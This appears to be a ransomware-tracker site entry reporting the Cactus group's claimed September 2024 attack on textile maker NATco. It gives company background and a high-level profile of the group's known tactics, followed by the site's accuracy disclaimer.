Ransomware Attack Hits North American Textile Company NATco
Incident Date:
September 17, 2024
Overview
Title
Ransomware Attack Hits North American Textile Company NATco
Victim
North American Textile Company, LLC (NATco)
Attacker
Cactus
Location
First Reported
September 17, 2024
Ransomware Attack on North American Textile Company, LLC by Cactus Group
North American Textile Company, LLC (NATco), a prominent player in the textile manufacturing sector, has recently fallen victim to a ransomware attack orchestrated by the Cactus Ransomware Group. This incident has compromised a significant amount of sensitive data, posing a severe threat to the company's operations and reputation.
About North American Textile Company, LLC (NATco)
Founded in 1991 and headquartered in Los Angeles, California, NATco specializes in providing innovative textile solutions for the apparel and home goods industries. The company operates over 600 looms, printing presses, and finishing equipment across multiple global locations, including North America, Central and South America, Asia, Africa, Europe, and the Middle East. NATco is known for its commitment to sustainability and innovation, utilizing advanced technologies and environmentally friendly practices to minimize waste and reduce its carbon footprint.
Details of the Attack
The Cactus Ransomware Group has claimed responsibility for the attack on NATco via their dark web leak site. The attack has led to the compromise of a wide array of sensitive data, including employees' personal and corporate information, customer details, corporate correspondence, and database backups. The attackers have provided download links for the stolen data, further exacerbating the potential damage to NATco's operations and reputation. The company's annual revenue stands at $38.5 million, and its main office is located at 346 W Cerritos Ave, Glendale, California.
About the Cactus Ransomware Group
Identified in March 2023, the Cactus Ransomware Group has quickly become a notable player in the ransomware landscape. The group employs sophisticated tactics, including exploiting vulnerabilities in VPN appliances and leveraging phishing attacks to gain initial access. Cactus ransomware is a double-extortion Ransomware-as-a-Service (RaaS) variant that not only encrypts data but also threatens to leak sensitive information if the ransom is not paid. The malware employs a unique approach by encrypting its own binary to evade detection by antivirus software, utilizing a combination of RSA and AES algorithms.
Penetration and Impact
Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably those from Fortinet, and vulnerabilities in data analytics platforms like Qlik Sense. Once inside a network, Cactus establishes command and control communications via SSH and utilizes Scheduled Tasks to maintain persistence. The group has targeted over 100 entities, including large corporations across the United States, Italy, the UK, Switzerland, and France, making it one of the fastest-growing ransomware threats in 2023.
Sources
Recent Ransomware Attacks
The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.
The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.